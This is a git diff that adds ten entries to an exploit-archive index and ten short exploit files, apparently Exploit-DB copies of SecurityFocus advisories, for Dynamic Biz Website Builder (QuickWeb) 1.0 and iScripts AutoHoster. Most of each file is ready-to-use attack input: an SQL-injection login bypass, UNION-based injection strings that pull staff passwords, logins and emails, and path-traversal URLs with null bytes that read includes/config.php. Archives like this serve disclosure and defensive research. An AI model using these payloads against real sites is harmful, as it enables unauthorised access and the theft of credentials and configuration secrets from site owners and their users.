diff --git a/files.csv b/files.csv
index d7b5aa947..a10d6b3e2 100755
--- a/files.csv
+++ b/files.csv
@@ -35147,3 +35147,13 @@ id,file,description,date,author,platform,type,port
 38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download Vulnerability",2013-12-11,"Daniel Godoy",php,webapps,0
 38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0
 38882,platforms/cgi/webapps/38882.txt,"Icinga cgi/config.c process_cgivars Function Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0
+38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0
+38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 login.asp Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0
+38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster /checktransferstatus.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster /checktransferstatusbck.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster /payinvoiceothers.php invno Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster /support/parser/main_smtp.php Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
+38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster /admin/downloadfile.php fname Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
diff --git a/platforms/asp/webapps/38883.txt b/platforms/asp/webapps/38883.txt
new file mode 100755
index 000000000..0b10cbe6a
--- /dev/null
+++ b/platforms/asp/webapps/38883.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64371/info
+
+EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/dweb/apps/news-events/newdetail.asp?id=1=[SQL INJECTION] 
\ No newline at end of file
diff --git a/platforms/asp/webapps/38884.txt b/platforms/asp/webapps/38884.txt
new file mode 100755
index 000000000..9a950f717
--- /dev/null
+++ b/platforms/asp/webapps/38884.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64371/info
+ 
+EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+ 
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+ 
+EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.
+
+www.example.com/dweb/login.asp
+
+UserID : x' or ' 1=1--
+Password : x' or ' 1=1-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/38885.txt b/platforms/php/webapps/38885.txt
new file mode 100755
index 000000000..9562b05a4
--- /dev/null
+++ b/platforms/php/webapps/38885.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. 
+
+/checktransferstatus.php
+Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337
+Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337
+Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337
\ No newline at end of file
diff --git a/platforms/php/webapps/38886.txt b/platforms/php/webapps/38886.txt
new file mode 100755
index 000000000..fd010d43d
--- /dev/null
+++ b/platforms/php/webapps/38886.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/64377/info
+ 
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+ 
+/checktransferstatusbck.php
+Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337
+Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337
+Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337
\ No newline at end of file
diff --git a/platforms/php/webapps/38887.txt b/platforms/php/webapps/38887.txt
new file mode 100755
index 000000000..580485576
--- /dev/null
+++ b/platforms/php/webapps/38887.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64377/info
+  
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+  
+Time based Blind Injection
+/additionalsettings.php
+Post : submit=faris&cmbdomain=%Inject_Here%
\ No newline at end of file
diff --git a/platforms/php/webapps/38888.txt b/platforms/php/webapps/38888.txt
new file mode 100755
index 000000000..dc980bceb
--- /dev/null
+++ b/platforms/php/webapps/38888.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/64377/info
+   
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+   
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+   
+/payinvoiceothers.php
+invno=%Inject_Here%
\ No newline at end of file
diff --git a/platforms/php/webapps/38889.txt b/platforms/php/webapps/38889.txt
new file mode 100755
index 000000000..9b3eb0177
--- /dev/null
+++ b/platforms/php/webapps/38889.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64377/info
+    
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+    
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+    
+/support/parser/main_smtp.php
+^
+Just light sandwitch before the fatty food :))
\ No newline at end of file
diff --git a/platforms/php/webapps/38890.txt b/platforms/php/webapps/38890.txt
new file mode 100755
index 000000000..3a1a8775c
--- /dev/null
+++ b/platforms/php/webapps/38890.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/64377/info
+     
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+     
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+     
+/websitebuilder/showtemplateimage.php
+include_once "includes/session.php";
+include_once "includes/function.php";
+$templateid    = $_GET['tmpid'];
+$type      = $_GET['type'];
+if ($type == "home") {
+  $imagename  = "homepageimage.jpg";
+} else if($type == "sub") {
+  $imagename  = "subpageimage.jpg";
+} else {
+  $imagename  = "thumpnail.jpg";
+}
+readfile("./".$_SESSION["session_template_dir"]."/".$templateid."/$imagename");
+Hmmm , we can cancel the imagename value via the null byte %00
+[+] Exploit : /websitebuilder/showtemplateimage.php?tmpid=../../includes/config.php%00&type=sub
\ No newline at end of file
diff --git a/platforms/php/webapps/38891.txt b/platforms/php/webapps/38891.txt
new file mode 100755
index 000000000..6464dd8e8
--- /dev/null
+++ b/platforms/php/webapps/38891.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64377/info
+      
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+      
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+      
+/admin/downloadfile.php > probably injected by the Guy who nulled the script (thank u any way ;p)
+$filename  = urldecode($_GET['fname']);
+header("content-disposition:attachment;filename=$filename");
+readfile($filename)
+no need to cancel any thing , just beat it bro ;)
+[+] Exploit : /admin/downloadfile.php?fname=../includes/config.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38892.txt b/platforms/php/webapps/38892.txt
new file mode 100755
index 000000000..6b4b4c3f9
--- /dev/null
+++ b/platforms/php/webapps/38892.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/64377/info
+       
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+       
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+       
+/support/admin/csvdownload.php
+  $filename="../csvfiles/".addslashes($_GET["id"]).".txt";
+  header('Content-Description: File Transfer'); 
+  header('Content-Type: application/force-download'); 
+  header('Content-Length: ' . filesize($filename)); 
+  header('Content-Disposition: attachment; filename=' . basename($filename)); 
+  readfile($filename);
+[+] Exploit : /support/admin/csvdownload.php?id=../../includes/config.php%00
\ No newline at end of file